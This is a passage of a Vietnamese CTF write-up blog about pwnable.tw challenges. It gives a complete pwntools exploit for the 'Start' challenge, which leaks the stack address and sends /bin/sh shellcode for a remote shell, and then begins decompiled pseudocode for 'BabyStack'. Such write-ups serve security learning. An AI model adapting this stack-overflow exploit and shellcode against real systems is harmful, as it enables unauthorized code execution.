<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload2</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="n">leaked_esp</span> <span class="o">+</span> <span class="mh">0x14</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcode</span>
</code></pre></div></div>

<h3 id="v-mã-khai-thác">V. Mã khai thác</h3>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">r</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">chall.pwnable.tw</span><span class="sh">"</span><span class="p">,</span> <span class="mi">10000</span><span class="p">)</span>

<span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</span><span class="sh">"</span> 

<span class="n">payload1</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x08048087</span><span class="p">)</span>
<span class="n">r</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">,</span> <span class="n">payload1</span><span class="p">)</span> 
<span class="n">esp_leaked</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="nf">recv</span><span class="p">()[:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">payload2</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="n">esp_leaked</span> <span class="o">+</span> <span class="mh">0x14</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcode</span>
<span class="n">r</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">payload2</span><span class="p">)</span>

<span class="n">r</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<h3 id="vi-tham-khảo">VI. Tham khảo</h3>
<ol>
  <li><a href="https://hackmd.io/@y198/ry6GrF3gi">Pwnable.tw - Start @y198</a></li>
  <li><a href="https://blog.csdn.net/weixin_43483799/article/details/113844032">Pwnable.tw - Start @c01dkit</a></li>
</ol>

<h2 id="0x02-babystack">0x02 BabyStack</h2>

<p>Sau khi decompile và rename các biến, chúng ta thu được mã giả như sau</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">_QWORD</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rcx</span>
    <span class="n">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rdx</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-60h] BYREF</span>
    <span class="n">__int64</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// [rsp+40h] [rbp-20h] BYREF</span>
    <span class="kt">char</span> <span class="n">option</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> <span class="c1">// [rsp+50h] [rbp-10h] BYREF</span>

    <span class="n">mmap_canary</span><span class="p">();</span>
    <span class="n">random_fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/urandom"</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="n">random_fd</span><span class="p">,</span> <span class="n">random_password</span><span class="p">,</span> <span class="mh">0x10uLL</span><span class="p">);</span>
    <span class="n">v3</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span>
    <span class="n">v4</span> <span class="o">=</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">canary</span> <span class="o">=</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="n">v3</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span>
    <span class="n">close</span><span class="p">(</span><span class="n">random_fd</span><span class="p">);</span>
    <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"&gt;&gt; "</span><span class="p">,</span> <span class="mi">3uLL</span><span class="p">);</span>
        <span class="n">read_</span><span class="p">(</span><span class="mi">0LL</span><span class="p">,</span> <span class="n">option</span><span class="p">,</span> <span class="mh">0x10LL</span><span class="p">,</span> <span class="mh">0x10LL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'2'</span> <span class="p">)</span>                 <span class="c1">// exit()</span>
        <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'3'</span> <span class="p">)</span>
        <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span> <span class="n">status_login</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="n">copy_input</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
            <span class="p">}</span>
            <span class="k">else</span>
            <span class="p">{</span>
<span class="nl">LABEL_x1040:</span>
                <span class="n">puts</span><span class="p">(</span><span class="s">"Invalid choice"</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="sc">'1'</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="k">goto</span> <span class="n">LABEL_x1040</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="k">if</span> <span class="p">(</span> <span class="n">status_login</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="n">status_login</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">else</span>
            <span class="p">{</span>
                <span class="n">login</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">random_password</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">status_login</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">memcmp</span><span class="p">(</span><span class="n">random_password</span><span class="p">,</span> <span class="n">canary</span><span class="p">,</span> <span class="mh">0x10uLL</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

 -->
  </div>

  <div id="disqus_thread"></div>

</article>
      </div>
    </div>

    <footer class="site-footer">

  <div class="wrapper">

    <h2 class="footer-heading">Duc Dat Dau</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li>Duc Dat Dau</li>
          <li><a href="mailto:contact.ducdatdau@gmail.com">contact.ducdatdau@gmail.com</a></li>
          <!-- <li><script type="text/javascript" id="clustrmaps" src="//clustrmaps.com/map_v2.js?d=bWWMtUHXhX4_KVnkJ-k1GL_PEZEA0lCjHMP81H6JXAA&cl=ffffff&w=a"></script></li> -->
          <li><script type="text/javascript" id="clstr_globe" src="//clustrmaps.com/globe.js?d=hTxyDCpAFGmse2NCHLjlA3079v7NSBHXIjnN8mG-hlE"></script></li>
        </ul>
      </div>

      <div class="footer-col footer-col-2">
        <ul class="social-media-list">
          
          <li>
            <a href="https://github.com/ducdatdau"><span class="icon icon--github"><svg viewBox="0 0 16 16"><path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"/></svg>
</span><span class="username">ducdatdau</span></a>

          </li>
          

          
          <li>
            <a href="https://twitter.com/ducdatdau"><span class="icon icon--twitter"><svg viewBox="0 0 16 16"><path fill="#828282" d="M15.969,3.058c-0.586,0.26-1.217,0.436-1.878,0.515c0.675-0.405,1.194-1.045,1.438-1.809c-0.632,0.375-1.332,0.647-2.076,0.793c-0.596-0.636-1.446-1.033-2.387-1.033c-1.806,0-3.27,1.464-3.27,3.27 c0,0.256,0.029,0.506,0.085,0.745C5.163,5.404,2.753,4.102,1.14,2.124C0.859,2.607,0.698,3.168,0.698,3.767 c0,1.134,0.577,2.135,1.455,2.722C1.616,6.472,1.112,6.325,0.671,6.08c0,0.014,0,0.027,0,0.041c0,1.584,1.127,2.906,2.623,3.206 C3.02,9.402,2.731,9.442,2.433,9.442c-0.211,0-0.416-0.021-0.615-0.059c0.416,1.299,1.624,2.245,3.055,2.271 c-1.119,0.877-2.529,1.4-4.061,1.4c-0.264,0-0.524-0.015-0.78-0.046c1.447,0.928,3.166,1.469,5.013,1.469 c6.015,0,9.304-4.983,9.304-9.304c0-0.142-0.003-0.283-0.009-0.423C14.976,4.29,15.531,3.714,15.969,3.058z"/></svg>
</span><span class="username">ducdatdau</span></a>

          </li>
          

          
          <li>
            <a href="https://www.linkedin.com/in/ducdatdau">
  <span class="icon icon--linkedin"><svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg" fill-rule="evenodd" clip-rule="evenodd" stroke-linejoin="round" stroke-miterlimit="1.414"><path d="M13.632 13.635h-2.37V9.922c0-.886-.018-2.025-1.234-2.025-1.235 0-1.424.964-1.424 1.96v3.778h-2.37V6H8.51v1.04h.03c.318-.6 1.092-1.233 2.247-1.233 2.4 0 2.845 1.58 2.845 3.637v4.188zM3.558 4.955c-.762 0-1.376-.617-1.376-1.377 0-.758.614-1.375 1.376-1.375.76 0 1.376.617 1.376 1.375 0 .76-.617 1.377-1.376 1.377zm1.188 8.68H2.37V6h2.376v7.635zM14.816 0H1.18C.528 0 0 .516 0 1.153v13.694C0 15.484.528 16 1.18 16h13.635c.652 0 1.185-.516 1.185-1.153V1.153C16 .516 15.467 0 14.815 0z" fill-rule="nonzero"/></svg></span>
  <span class="label">ducdatdau</span>
</a>

          </li>
          
        </ul>
      </div>

      <div class="footer-col footer-col-3">
        <p>tôi muốn mình vẫn mãi như thế, có người hỏi tôi đã từng này tuổi rồi, không thể bớt một chút “tự do” được hay sao?💭
</p>
      </div>
    </div>

  </div>

</footer>


  </body>

</html>
